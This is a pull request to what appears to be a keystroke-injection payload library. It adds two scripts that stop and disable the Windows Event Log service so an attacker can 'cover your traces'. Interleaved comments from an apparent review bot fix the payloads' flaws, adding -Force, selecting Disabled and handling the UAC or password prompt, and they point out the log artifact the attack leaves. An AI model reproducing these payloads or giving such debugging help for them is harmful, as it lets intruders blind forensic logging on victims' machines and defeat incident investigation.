Disable windows event logging #235

Open. Wants to merge 1 commit into base: master.
37 changes: 37 additions & 0 deletions payloads/library/execution/disable_windows_event_logging/README.md
@@ -0,0 +1,37 @@

# Disable Windows Event Logging

A script used to disable all Windows event logging on Windows 11.

**Category**: Execution

## Description

Event logging can be used as a tool in forensics to determine what an attack entailed.
In order to cover your traces, Windows Event Logging can be disabled.
These scripts demonstrate two approaches;
- CLI based
- UI based

While the CLI based approach is more concise, requires less interaction (and therefore has fewer pitfalls) and faster, some might prefer
the UI based approach for demonstration purposes as it allows watching the attack play out.

The CLI based approach starts an Powershell Window with administrator rights and executes two commands.
The UI based approach clicks itself through the setting panes until it reaches the right place.


The CLI script assumes that the currently logged in user has admin rights, if this is not the case, the admin password has to be substituted into the payload at the indicated line.
If the UI script is used, the delay speeds may be adjusted to the (expected) speed of the attacked host.

## Getting Started

### Dependencies

* Windows 11 with Powershell
* Windows Admin Permissions

### Settings

* Set the password for non default use (current user does not have admin rights)
* Set delay times to your requirement

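Review bot: the Settings list ("Set the password for non default use", "Set delay times to your requirement") omits the keyboard layout, yet the CLI payload hardcodes `DUCKY_LANG DE_CH` and the UI payload sets none; add a layout entry under Settings and Dependencies, because `STRING Windows Event Log` and the quotes in `-Name "eventlog"` are layout-dependent and a US-layout target will receive different keystrokes. The description also overstates what the payloads do: "disable all Windows event logging" and "clicks itself through the setting panes" should say that both variants stop the Windows Event Log service (`eventlog`) and change its startup type, one through services.msc and one with `Stop-Service`/`Set-Service`. That matters for the "cover your traces" sentence, since stopping the service is itself recorded before it goes down (Security log event 1100, "The event logging service has shut down"), so the README should state that this artifact is left behind. Finally, `**Category**: Execution` and the `payloads/library/execution/` path do not fit: disabling logging is defense evasion / anti-forensics, not execution.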
@@ -0,0 +1,39 @@
DELAY 200
GUI r
DELAY 2000
STRINGLN services.msc
DELAY 4000
TAB
DELAY 2000
STRING Windows Event Log
DELAY 2000
ENTER
DELAY 1000
TAB
DELAY 2000
STRING m
DELAY 2000
TAB
DELAY 2000
ENTER
DELAY 6000
TAB
DELAY 2000
TAB
DELAY 2000
TAB
DELAY 2000
TAB
DELAY 2000
ENTER
DELAY 2000
TAB
DELAY 2000
TAB
DELAY 2000
TAB
DELAY 2000
TAB
DELAY 2000
ENTER
DELAY 500
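Review bot: the `STRING m` that follows the first `TAB` inside the properties dialog reads as type-ahead into the Startup type combo box, and `m` selects Manual, not Disabled; the CLI variant sets `-StartupType Disabled`, so the two payloads leave the service in different states and the README should say which is intended (type `d` if Disabled is meant). The rest of the dialog navigation is four `TAB`s and `ENTER`, done twice, with fixed `DELAY 2000` steps and no `DUCKY_LANG`, so nothing in the file tells a user which control each `TAB`/`ENTER` is expected to land on; a `REM` per step (services.msc row type-ahead, Startup type, Stop button, OK) would make the counts and delays adjustable, which is what the README's "delay speeds may be adjusted" promises. Also add the same `DUCKY_LANG` line the CLI payload uses, or document that this one assumes the target's layout, since `STRING Windows Event Log` is the only thing selecting the right service.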
@@ -0,0 +1,16 @@
DUCKY_LANG DE_CH
DELAY 50
GUI x
DELAY 100
STRINGLN a
DELAY 600
REM replace the following line with the admin password if necessary
LEFTARROW
DELAY 50
ENTER
DELAY 2000
STRINGLN Stop-Service -Name "eventlog"
DELAY 200
STRINGLN Set-Service -Name "eventlog" -StartupType Disabled
DELAY 300
STRINGLN exit
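Review bot: `Stop-Service -Name "eventlog"` without `-Force` refuses to stop a service that has dependent services, and the Windows Event Log service has dependents on a standard install, so as written the first command fails with a dependency error and the following `Set-Service -Name "eventlog" -StartupType Disabled` only changes the startup type while logging keeps running until reboot; use `Stop-Service -Name eventlog -Force` (which stops the dependents first) and verify with `(Get-Service eventlog).Status` before the `STRINGLN exit`. The UAC handling at `LEFTARROW` / `ENTER` presses Yes on the consent prompt, which only appears when the logged-in user is an administrator; the `REM` says to replace that line with the admin password, but a credential prompt needs `STRING <password>` followed by `ENTER` with the `LEFTARROW` removed, and `DELAY 600` is short for the secure-desktop switch on Windows 11, so spell both out in the comment. Minor: `DUCKY_LANG DE_CH` is a setting the README never mentions, and on Windows 11 `GUI x` then `a` opens "Terminal (Admin)", whose default profile is PowerShell only if the user has not changed it; a `REM` noting both would save a failed run.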